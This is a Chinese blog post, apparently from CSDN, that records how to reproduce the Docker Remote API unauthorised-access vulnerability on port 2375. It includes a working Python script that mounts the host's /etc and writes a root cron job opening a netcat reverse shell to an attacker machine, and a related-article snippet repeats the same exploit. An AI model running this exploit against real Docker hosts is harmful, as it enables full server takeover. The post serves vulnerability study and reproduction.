docker未授权访问漏洞总结

最新推荐文章于 2024-06-11 17:05:35 发布
最新推荐文章于 2024-06-11 17:05:35 发布
阅读量1.3k 收藏
点赞数 1
分类专栏: 未授权访问
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746681/article/details/108934198
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

记录并复现常见的未授权访问漏洞

一、docker未授权访问漏洞是什么?

Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。常见端口2375

二、复现

1.环境搭建

在这里插入图片描述
如果访问如下页面,返回一个json格式的值{“message”:“page not found”}即存在漏洞也可以访问ip/version或者ip/info获取基本信息

2 漏洞利用

import docker

client = docker.DockerClient(base_url='http://192.168.1.8:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.1.8 1111 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

通过该脚本写入计划任务进行反弹shell
执行完脚本,耐心等待一会才会反弹shell到kali主机,大约一分多钟时间。

该处使用的url网络请求的数据。

qq_45746681
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DOCKER REMeOTE API 授权访问漏洞复现
weixin_43061533的博客
12-01 712
0x01 漏洞简述 Docker Remote API是一个取代远程命令行界面(rcli)的REST API。本文中,我们将使用命令行工具cURL来处理url相关操作。cURL可以发送请求、获取以及发送数据、检索信息。 0x02 风险等级 严漏洞的评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 Dockerdocker.service设置为0.0.0.0/lib/systemd/system/docker.service,导致任意访问 Docker没有使用iptables
计算机英语常用词汇总结
04-27
3. **Access Token** - 访问令牌是操作系统用来验证用户身份并授权访问资源的小型数据结构。 4. **Algorithm** - 算法是一系列解决问题或执行任务的明确指示,通常包括一系列步骤或计算过程。 5. **Address ...
Docker授权访问漏洞
HAKUNAMATATATTA的博客
12-01 1994
攻击者利用 dockerclient 或者 http 直接请求就可以访问这个API,可能导致敏感信息泄露,也可以删除Docker上的数据。攻击者可进一步利用Docker自身特性,直接访问宿主机上的敏感信息,或对敏感文件进行修改,最终完全控制服务器。
Docker授权访问漏洞详解
最新发布
m0_64481831的博客
06-11 1211
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。
授权访问Docker授权访问漏洞
qq_68163788的博客
05-14 1966
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
Docker授权访问漏洞(www.hetianlab.com)
懂进攻知防守
07-20 3241
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。Docker Daemon把服务暴露在tcp的2375端口上,这样就可以在网络上操作Docker了。Docker本身没有身份认证的功能,只要网络上能访问到服务端口,就可以操作Docker。...
Docker容器安全性解决方案.pdf
10-11
例如,可以使用 Docker 的安全机制来限制容器的访问权限,防止授权访问等安全问题。 容器网络安全是指在容器之间或容器与外部网络之间的网络连接中,为了确保数据的安全传输,采取的一些安全机制和解决方案。...
基于Kubernetes和Docker技术的企业级容器云平台解决方案.docx
11-22
- **容器安全策略**:实施严格的访问控制和权限策略,防止授权的容器访问敏感资源。 - **容器镜像安全**:确保只使用可信的、经过验证的镜像,避免恶意代码的引入。 - **网络隔离**:利用Kubernetes的网络策略...
安全体系 充满活力的块数据侦查取证 - visual studio code.zip
11-06
在设计系统架构时,应考虑如何防止授权访问,保护敏感信息,并确保系统的可扩展性和可靠性。VS Code支持多种框架和平台,如Android和Docker,可以助力开发者构建安全的分布式系统,同时,其强大的调试工具也有...
FTP小型Server
06-26
保持服务器软件更新,及时修补已知的安全漏洞。为了保证服务的稳定性和可用性,应定期备份服务器上的数据,并设定合理的上传下载速度限制,以防大量文件传输导致网络拥堵。 FTP客户端的使用: FTP客户端如FileZilla...
漏洞复现 - - -Docker授权访问漏洞
weixin_67503304的博客
08-16 4908
Docker授权访问漏洞docker授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
Docker API 授权访问漏洞
qq_42383069的博客
05-09 7773
Docker API 授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
docker daemon api 授权访问漏洞
EC_Carrot的博客
05-26 201
漏洞复现 利用方法是,我们随意启动一个容器,并将宿主机的/etc目录挂载到容器中,便可以任意读写文件了。我们可以将命令写入crontab配置文件,进行反弹shell。 利用EXP: import docker client = docker.DockerClient(base_url='http://attack-ip:2375/') data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc yo
Docker授权访问漏洞复现
m0_43397796的博客
12-13 2877
docker授权访问是怎么回事呢?docker授权访问是怎么回事相信大家都很熟悉,但是docker授权访问是怎么回事呢,下面就让小编带大家一起了解吧。 docker授权访问是怎么回事,其实就是docker授权访问是怎么回事,大家可能会很惊讶docker授权访问怎么会是这么回事呢?但事实就是这样,小编也感到非常惊讶。 这就是关于docker授权访问是怎么回事的事情了,大家有什么想法呢,欢迎在评论区告诉小编一起讨论哦!...
Docker授权访问漏洞利用
tangshuangsss的专栏
01-08 2032
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到...
Docker 授权访问漏洞
Thunderclap的博客
07-13 2040
Docker 授权访问漏洞
Docker Registry 授权访问漏洞
04-25
Docker Registry 授权访问漏洞是指攻击者可以在授权的情况下访问或者下载镜像。这种漏洞的危害性较大,因为攻击者可以使用被盗取的镜像发起攻击,造成不可预测的后果。要解决这个问题,可以通过限制访问 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值